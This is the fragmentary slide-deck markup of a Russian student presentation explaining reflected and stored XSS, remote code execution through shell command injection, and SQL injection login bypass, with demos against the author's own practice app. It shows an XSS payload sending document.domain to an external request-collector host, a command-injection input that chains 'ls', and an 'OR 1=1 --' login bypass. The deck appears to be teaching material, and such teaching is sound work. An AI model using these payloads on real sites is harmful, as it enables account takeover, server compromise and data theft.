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e220d0a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e220d0a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e220d0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e220d0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e220d0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ce220d0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ce220d0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ce220d0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e220d0a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e220d0a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ce220d0a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ce220d0a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a90ce5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a90ce5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90ce5b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90ce5b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a90ce5b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a90ce5b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a90ce5b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a90ce5b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e220d0a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e220d0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a90ce5b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a90ce5b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a90ce5b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a90ce5b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a90ce5b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a90ce5b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a90ce5b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a90ce5b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a90ce5b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a90ce5b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a90ce5b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a90ce5b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a90ce5b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a90ce5b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a90ce5b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a90ce5b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a90ce5b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a90ce5b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a90ce5b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a90ce5b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e220d0a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e220d0a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e220d0a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e220d0a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e220d0a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e220d0a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ce220d0a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ce220d0a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e220d0a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ce220d0a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ce220d0a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ce220d0a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e220d0a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e220d0a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JaysesS/Overview-of-web-vulnerabilities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6100" y="1289850"/>
            <a:ext cx="56325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Угрозы веб безопасности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Подготовил студент группы ИЗ-41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Ольшанский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15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Reflected XSS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Stored XSS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DOM-based XSS (?)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Reflected XSS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2206339" y="1425100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Боб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Формирует вредоносную ссылку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Отправляет Алисе</a:t>
            </a:r>
            <a:endParaRPr sz="15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25" y="1425100"/>
            <a:ext cx="472225" cy="23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206342" y="2642439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Алиса не</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>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Переходит по ссылке Боба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К примеру, куки уходят к Бобу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“Дарит” Бобу контроль над своим аккаунтом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Практикуемся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100" y="1117875"/>
            <a:ext cx="55738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Отправим как задумано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38" y="1149725"/>
            <a:ext cx="491893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Эксплуатируем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117875"/>
            <a:ext cx="3925637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97" y="1117875"/>
            <a:ext cx="3688000" cy="14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Разбираемся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153525"/>
            <a:ext cx="75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1337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img = new </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="12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img.src =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"https://enm3vddkwx8b.x.pipedream.net?some_data="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document.domain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'body'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).appendChild(img)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00" y="3008600"/>
            <a:ext cx="5886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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> XSS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2206339" y="1425100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Боб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Боб формирует, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>например</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>, комментарий с нагрузкой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Ждёт</a:t>
            </a:r>
            <a:endParaRPr sz="15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25" y="1425100"/>
            <a:ext cx="472225" cy="23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206342" y="2642439"/>
            <a:ext cx="63945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Алиса не знает о уязвимости на сервере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Заходит на сайт, браузер отрисовывает комментарий Боба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Алиса “данные” данные Бобу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Практикуемся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3063" r="1488" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1086025"/>
            <a:ext cx="763595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Отправим как задумано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375" y="1165675"/>
            <a:ext cx="681116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Эксплуатируем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50" y="1205475"/>
            <a:ext cx="584998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 чём?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Что такое веб-приложение?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Какие есть уязвимости?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Возможно ли написать уязвимое, если использовать новые технологии?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Разбираемся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97500" y="1010200"/>
            <a:ext cx="75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1337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var img = new </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="6495E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B0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img.src =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"https://enm3vddkwx8b.x.pipedream.net?some_data="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document.domain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2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'body'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="B0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).appendChild(img)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="56B7C3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56B7C3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475" y="2694788"/>
            <a:ext cx="58769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RCE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297500" y="1185375"/>
            <a:ext cx="773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RCE (Remote code execution) - является максимальной угрозой класса А1 по классификации OWASP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Возможность удаленного внедрения кода в серверный скрипт в 100% случаев приводит к взлому ресурса.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С помощью RCE злоумышленник сразу получает доступ к серверу атакуемого сайта, размещая на нем веб-шеллы, или любой другой вредоносный код.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Начинаем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38" y="1078050"/>
            <a:ext cx="427733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Смотрим код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450" y="936825"/>
            <a:ext cx="6392999" cy="4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Продолжаем смотреть код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52600"/>
            <a:ext cx="7275850" cy="1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вообще происходит?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477725" y="1607350"/>
            <a:ext cx="855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Команда формируемая на сервере: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command = 'echo "' + str(note) + '" &gt; ' + os.path.join(os.path.abspath("."),'data_rce/')+ str(randint(0,100)) + '.txt'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Упростим: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command = 'echo "' +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ВВОД_ПОЛЬЗОВАТЕЛЯ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> + '" &gt; data_rce/рандомное_число.txt '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Команда которая уходит в терминал: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ВВОД_ПОЛЬЗОВАТЕЛЯ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>" &gt; data_rce/рандомное_число.txt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Эксплуатируем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1297500" y="1567550"/>
            <a:ext cx="70389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ВВОД_ПОЛЬЗОВАТЕЛЯ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>" &gt; data_rce/рандомное_число.txt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А если ввод пользователя будет с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en" sz="1400"/>
              <a:t>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К примеру такой: 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1"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75" y="3162225"/>
            <a:ext cx="5524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Почему? И давай уже ..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297500" y="1193325"/>
            <a:ext cx="70389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Вывод про ошибку синтаксиса bash логичен, ведь получилась команда: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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>" &gt; data_rce/рандомное_число.txt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Поправим и посмотрим что есть в данной директории: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echo "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1" &amp;&amp; ls #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>" &gt; data_rce/рандомное_число.txt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25" y="3162150"/>
            <a:ext cx="54959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Найдем</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> секрет</a:t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25" y="1046250"/>
            <a:ext cx="369275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Спасибо за внимание</a:t>
            </a:r>
            <a:endParaRPr sz="2900"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1078650" y="1673500"/>
            <a:ext cx="747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 u="sng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https://github.com/JaysesS/Overview-of-web-vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="9900FF"/>
              </a:solidFill>
            </a:endParaRPr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163" y="2505375"/>
            <a:ext cx="2022419" cy="27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50" y="223825"/>
            <a:ext cx="79248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385400" y="1234125"/>
            <a:ext cx="76515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Как происходит уязвимая авторизация?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Получили с формы данные от пользователя,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 примеру username - “jayse”, а пароль - “candal”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Делаем запрос в БД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* FROM Users WHERE username=”jayse” AND password=”candal”;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Если БД нам ответило, то пропускаем, иначе выводим “Проверьте ввод”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Начинаем шалости c SQL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1066925" y="1234125"/>
            <a:ext cx="80097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Изначальный запрос: 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* FROM Users WHERE username=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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jayse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 AND password=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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candal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Заменим </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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jayse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en" sz="16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1” OR 1=1 --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и что произойдёт?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SELECT * FROM Users WHERE username=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="16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1” OR 1=1 --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 AND password=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="16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3434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Запрос “преобразился” в совсем другой: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* FROM Users WHERE username=”1” OR 1=1;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81575" y="23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Пробуем на практике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87" y="856075"/>
            <a:ext cx="6640475" cy="40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1419" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1326075" y="1149700"/>
            <a:ext cx="688282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Вводим правильно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75" y="1460225"/>
            <a:ext cx="5806834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297500" y="899725"/>
            <a:ext cx="36387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admin : admin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Вводим инъекцию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922600"/>
            <a:ext cx="26916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Admin : 1” OR 1=1 --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85" y="1456900"/>
            <a:ext cx="6427525" cy="18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3622850"/>
            <a:ext cx="6773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И мы не зная пароля очутились в каком-то кабинете.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В нашем случае еще и выводится что отдало БД.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